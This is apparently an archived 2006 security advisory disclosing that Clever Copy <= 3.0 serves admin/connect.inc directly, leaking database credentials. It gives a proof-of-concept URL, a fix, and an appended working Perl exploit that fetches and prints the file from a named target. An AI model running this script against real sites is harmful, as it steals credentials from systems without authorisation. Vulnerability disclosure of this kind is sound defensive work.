Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:12126
HistoryApr 10, 2006 - 12:00 a.m.

[ECHO_ADV_28$2006] Clever Copy <= 3.0 Connect.inc Critical Information Disclosure

2006-04-1000:00:00
vulners.com
8

\_ /\ ___ \ / | \\_ \
| ) / \ \// ~ \/ | \
| \\ \
\ Y / | \
/
_____ / \______ /\| /\_____ /
\/ \/ \/ \/

                                    .OR.ID

ECHO_ADV_28$2006


[ECHO_ADV_28$2006] Clever Copy <= 3.0 Connect.inc Critical Information Disclosure

Author : M.Hasran Addahroni
Date : April, 7th 2006
Location : Indonesia, Bali
Web : http://advisories.echo.or.id/adv/adv28-K-159-2006.txt
Critical Lvl : Medium

Affected software description:



Application : Clever Copy 
version     : 3.01 
URL         : http://clevercopy.bestdirectbuy.com/
Description :

Clever Copy is a free, fully scalable web site portal and news posting system. You can run it as a very simple blog or ramp it up to a full Content Management System. It is easy to setup, use and maintain requiring no previous knowledge of web portals, blogs, php, Cms&#39;s or databases. 

---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~~~~~~
Critical connect.inc file in admin folder are vulnerable to direct access to view &#39;critical&#39; information about the database username and password.

------------------connect.inc-----------------------------------
&lt;?php
..
//ENTER THE SETTINGS FOR THE CONNECTION TO YOUR DATABASE BELOW
$Host = &quot;localhost&quot;; // The hostname for your server. localhost works for most database servers or you may have to contact your hosts if you don&#39;t know
$Dbase = &quot;clevercopy&quot;; // The name of your database on your database server
$User = &quot;test&quot;;  // The username required to connect to your database
$Pass = &quot;test123&quot;; // The password required to connect to your database
..
?&gt;
------------------------------------------------------------------

Its works when file *.inc not declare in httpd.conf.

Poc:
~~~~~~~~~~~~

http://www.example.com/[clevercopy_path]/admin/connect.inc

Solution:
~~~~~~~~~

rename connect.inc into connect.inc.php to protect this vulnerability or declare *.inc in httpd.conf

---------------------------------------------------------------------------
Shoutz:
~~~~~~~

~ y3dips,the_day,moby,comex,z3r0byt3,c-a-s-e,S&#96;to,lirva32,anonymous,kaiten
~ masterpop3,maSter-oP,Lieur-Euy,Mr_ny3m,bithedz,murp,an0maly,fleanux,baylaw
~ SinChan,x&#96;shell,tety,sakitjiwa, m_beben, rizal, cR4SH3R, metalsploit,FeNNi
~ [email protected] 
~ #aikmel #e-c-h-o @irc.dal.net
---------------------------------------------------------------------------
Contact:
~~~~~~~~

     K-159 || echo|staff || eufrato[at]gmail[dot]com
     Homepage: http://k-159.echo.or.id/

-------------------------------- [ EOF ] ----------------------------------

Perl Exploit:
~~~~~~~~~~~~

#!/usr/bin/perl 
#
# Clever Copy &lt;= 3.0 connect.inc Critical Information disclosures Exploit
# Bug found &amp; code by K-159 
# Base on advisory at http://http://advisories.echo.or.id/adv/adv28-K-159-2006.txt
# 
# Description :
#  Critical connect.inc file in admin folder are vulnerable to direct access
#  to view &#39;critical&#39; information about the database username and password.
#
#  &lt;?php
#   ...
#  //ENTER THE SETTINGS FOR THE CONNECTION TO YOUR DATABASE BELOW
#   $Host = &quot;localhost&quot;; // The hostname for your server. localhost works for most database servers or you may have to contact your hosts if you don&#39;t know
#   $Dbase = &quot;clevercopy&quot;; // The name of your database on your database server
#   $User = &quot;test&quot;;  // The username required to connect to your database
#   $Pass = &quot;test123&quot;; // The password required to connect to your database
#  ...   
#   ?&gt; 
#
#  Its works when file *.inc not declare in httpd.conf
#
# Poc :
#  http://www.example.com/[clevercopy_path]/admin/connect.inc
#
# usage:
# perl celevercopy.pl www.target.com
#
# www.echo.or.id &#40;c&#41; 2006
#
# Greetz : echo|staff, aikmel|crew, masterpop3, SinChan, sakitjiwa, etc
# contact : eufrato[at]gmail.com www.echo.or.id
#
print &quot;&#92;n=======================================================&#92;n&quot;;
print &quot;* Clever Copy connect.inc Critical Information Disclosure Exploit by K-159  *&#92;n&quot;;
print &quot;*             www.echo.or.id #e-c-h-o irc.dal.net        *&#92;n&quot;;
print &quot;==========================================================&#92;n&quot;;
require LWP::UserAgent;

if&#40;@ARGV == 1&#41;
        {

$target= $ARGV[0];

my $ua = LWP::UserAgent-&gt;new;
$ua-&gt;agent&#40;&quot;MSIE/6.0 Windows&quot;&#41;;
$ua-&gt;timeout&#40;10&#41;;
$ua-&gt;env_proxy;

my @url = &#40;&quot;http://$target/admin/connect.inc&quot;&#41;;

foreach my $urlz &#40;@url&#41; {
            my $injek = $ua-&gt;get&#40;$urlz&#41;;
            print &quot;&#92;n-------------------------------&#92;n&quot;;
            if &#40;$injek-&gt;is_success&#41;
                 {   print $injek-&gt;content;} 
            else
                 {die $injek-&gt;status_line;}
            print &quot;&#92;n-------------------------------&#92;n&quot;;

}
}
else {
print &quot;&#92;n Use: perl $0 [www.target.com] &#92;n&quot;;
}